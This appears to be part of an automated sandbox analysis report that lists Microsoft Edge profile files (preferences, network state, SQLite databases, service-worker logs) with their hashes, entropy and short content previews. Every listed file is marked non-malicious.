                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:[]

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF2aec4.TMP (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:[]

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):40
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                          MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                          SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                          SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                          SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\aadbe0e9-3c1b-4218-959c-733095216e16.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:[]

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\c5f29bf0-b74e-48bc-a110-aca9fb24b53f.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                                                          Size (bytes):1767
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.29604202173015
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:YcCpfgCzsYtsm1fcKsaleeBkBRs7CgHSYhbw:F2fjL1VkeBkBcT3h0
                                                                                                                                                                                                                                                                                          MD5:001F5685520646DC1B8EB94AA42C6750
                                                                                                                                                                                                                                                                                          SHA1:C75972EB44797FAA923843A01A1D8E50D5A03853
                                                                                                                                                                                                                                                                                          SHA-256:D5B8520BEAA482371A441D26D1031A9673328D0F086376B2F4F3D6CC415F50B8
                                                                                                                                                                                                                                                                                          SHA-512:413B5F45C5B59CA046524418ADC3796945BEE99BDF81C634E0D0FD5ABB3C833EC5FAA579B169DE400B0FFD8943830E7DF9BF7B42C14928B47C7C5ADF5E407390
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13382636131521762","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13382636135247152","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380137736365604","port":443,"protocol_str":"quic"}],"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA="

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\cac8b4b4-676e-4a14-89d6-328ab4c44222.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):40
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                          MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                          SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                          SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                          SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\cdffea4f-b9e9-49ad-90a2-ec0f6d9f795a.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:[]

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\ffedd3aa-5869-47ed-b24d-bb1c4fcf1e9f.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1618
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.300219280553516
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:YcCp/WRdsyEyZVMdmwC5mWRdsXZFRudFGRw6ma3yeesw6C1VdsyyZFGJ/I3w6maF:YcCpWs6uCvsJfc7leeBRsfgCgkhYhbw
                                                                                                                                                                                                                                                                                          MD5:DAA6689D48F0E63BF12DE0B533E61307
                                                                                                                                                                                                                                                                                          SHA1:4B096964F1AC28CCA273B7646F77FE5D6B963857
                                                                                                                                                                                                                                                                                          SHA-256:8F0EDE645B73265FDE1459410F1F22D48DF47486B88463173E6DD01525D87AA1
                                                                                                                                                                                                                                                                                          SHA-512:58F153D53A680BAC9A918ED1AA9E91FAF26E194135C1DB35CF71FBA045061A1ECD83AC80C0A3C54E7584F37EE90FF54B4C20CB06A6DB246F9B0F03859D467F46
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343561982935006","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343561983636053","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwc

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing\campaign_history

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.8350301952073809
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:TLSOUOq0afDdWec9sJlAMoqsgC7zn2z8ZI7J5fc:T+OUzDbg3sAM/sgCnn2ztc
                                                                                                                                                                                                                                                                                          MD5:0DAD8D7F079797377CD56DAE47E1A619
                                                                                                                                                                                                                                                                                          SHA1:A353C01C5B9BA9E0315ABA74D3337B7D6EE97CB2
                                                                                                                                                                                                                                                                                          SHA-256:7BDA584E0C1BE9E104065370FD279A7E771D7EB4F7E4CC7C80F146931F150E33
                                                                                                                                                                                                                                                                                          SHA-512:5A57C0D303672564DDEAA08B5DAAEE1BA24B67C46100720CE69F0908427ACE55F330D96A772D0E1F96B595FBBD70E6145AA464FC4F312EFE095F9AC909E304E8
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):11501
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.2305056518486
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:st8kdpFscTIJZn4kaWSoRJV85UbV+F1olQw3lYsPgYJ:st8QFscTiZnEUbG1CQwD
                                                                                                                                                                                                                                                                                          MD5:DBA28EEB6E8BDE5142574E59CD663A29
                                                                                                                                                                                                                                                                                          SHA1:4B7210508B7FE7E6515565FD26147B5F470E4D20
                                                                                                                                                                                                                                                                                          SHA-256:FD4DD25E227ACAF0C54E6FC3888C020AFE7D13A1264782EA7F5F7F6EB8911E00
                                                                                                                                                                                                                                                                                          SHA-512:3E5C20D497A137387CB1A6BCD85417C16810A266B80E09E4D6C06DDA255E30062C305DA9E4898C238A6C40FF755F4CBA482DFBA74529C4000305E13081F008A0
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380044129800999","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340970644573687","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF2d73b.TMP (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):11501
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.2305056518486
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:st8kdpFscTIJZn4kaWSoRJV85UbV+F1olQw3lYsPgYJ:st8QFscTiZnEUbG1CQwD
                                                                                                                                                                                                                                                                                          MD5:DBA28EEB6E8BDE5142574E59CD663A29
                                                                                                                                                                                                                                                                                          SHA1:4B7210508B7FE7E6515565FD26147B5F470E4D20
                                                                                                                                                                                                                                                                                          SHA-256:FD4DD25E227ACAF0C54E6FC3888C020AFE7D13A1264782EA7F5F7F6EB8911E00
                                                                                                                                                                                                                                                                                          SHA-512:3E5C20D497A137387CB1A6BCD85417C16810A266B80E09E4D6C06DDA255E30062C305DA9E4898C238A6C40FF755F4CBA482DFBA74529C4000305E13081F008A0
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380044129800999","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340970644573687","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF3255b.TMP (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):11501
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.2305056518486
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:st8kdpFscTIJZn4kaWSoRJV85UbV+F1olQw3lYsPgYJ:st8QFscTiZnEUbG1CQwD
                                                                                                                                                                                                                                                                                          MD5:DBA28EEB6E8BDE5142574E59CD663A29
                                                                                                                                                                                                                                                                                          SHA1:4B7210508B7FE7E6515565FD26147B5F470E4D20
                                                                                                                                                                                                                                                                                          SHA-256:FD4DD25E227ACAF0C54E6FC3888C020AFE7D13A1264782EA7F5F7F6EB8911E00
                                                                                                                                                                                                                                                                                          SHA-512:3E5C20D497A137387CB1A6BCD85417C16810A266B80E09E4D6C06DDA255E30062C305DA9E4898C238A6C40FF755F4CBA482DFBA74529C4000305E13081F008A0
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380044129800999","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340970644573687","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF39a8b.TMP (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):11501
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.2305056518486
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:st8kdpFscTIJZn4kaWSoRJV85UbV+F1olQw3lYsPgYJ:st8QFscTiZnEUbG1CQwD
                                                                                                                                                                                                                                                                                          MD5:DBA28EEB6E8BDE5142574E59CD663A29
                                                                                                                                                                                                                                                                                          SHA1:4B7210508B7FE7E6515565FD26147B5F470E4D20
                                                                                                                                                                                                                                                                                          SHA-256:FD4DD25E227ACAF0C54E6FC3888C020AFE7D13A1264782EA7F5F7F6EB8911E00
                                                                                                                                                                                                                                                                                          SHA-512:3E5C20D497A137387CB1A6BCD85417C16810A266B80E09E4D6C06DDA255E30062C305DA9E4898C238A6C40FF755F4CBA482DFBA74529C4000305E13081F008A0
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380044129800999","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340970644573687","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):30243
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.565746121532621
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:cO/yh67pLGLhzyWPjPfg38F1+UoAYDCx9Tuqh0VfUC9xbog/OVAme4QDErwDipi2:cO/yhSchzyWPjPfg3u1jaBmerDdLt4
                                                                                                                                                                                                                                                                                          MD5:D88C1886A35732E31E70DF466202AD7D
                                                                                                                                                                                                                                                                                          SHA1:70A09737F7C9A52EF253049BB6080C8102847522
                                                                                                                                                                                                                                                                                          SHA-256:C28A8E3C552C259D506E225AC6362EA59417C703B4FB35F7FD8F9DABCDD1ABDE
                                                                                                                                                                                                                                                                                          SHA-512:026BF7C5C0F55C7586B1D2F78D61EFA991A078FB543F7A1A46048B44A83E834FD9E798533B7FFA70D19AA432FDF3F0303BF1CFA1C1D9D6126C81A625A1EBDF11
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380044129103691","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380044129103691","location":5,"ma

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF2d874.TMP (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):30243
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.565746121532621
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:cO/yh67pLGLhzyWPjPfg38F1+UoAYDCx9Tuqh0VfUC9xbog/OVAme4QDErwDipi2:cO/yhSchzyWPjPfg3u1jaBmerDdLt4
                                                                                                                                                                                                                                                                                          MD5:D88C1886A35732E31E70DF466202AD7D
                                                                                                                                                                                                                                                                                          SHA1:70A09737F7C9A52EF253049BB6080C8102847522
                                                                                                                                                                                                                                                                                          SHA-256:C28A8E3C552C259D506E225AC6362EA59417C703B4FB35F7FD8F9DABCDD1ABDE
                                                                                                                                                                                                                                                                                          SHA-512:026BF7C5C0F55C7586B1D2F78D61EFA991A078FB543F7A1A46048B44A83E834FD9E798533B7FFA70D19AA432FDF3F0303BF1CFA1C1D9D6126C81A625A1EBDF11
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380044129103691","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380044129103691","location":5,"ma

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000001.dbtmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):16
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                          MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                          SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                          SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                          SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000003.log

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2394
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.811513848069075
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:F2xc5NmB2cncmoDCRORpllg2hEzfRHlldCRORpllg2h6d+fFCRORpllg2hE2RHl5:F2emBHMrd6zfBTrdod+Xrd62BprdIBO
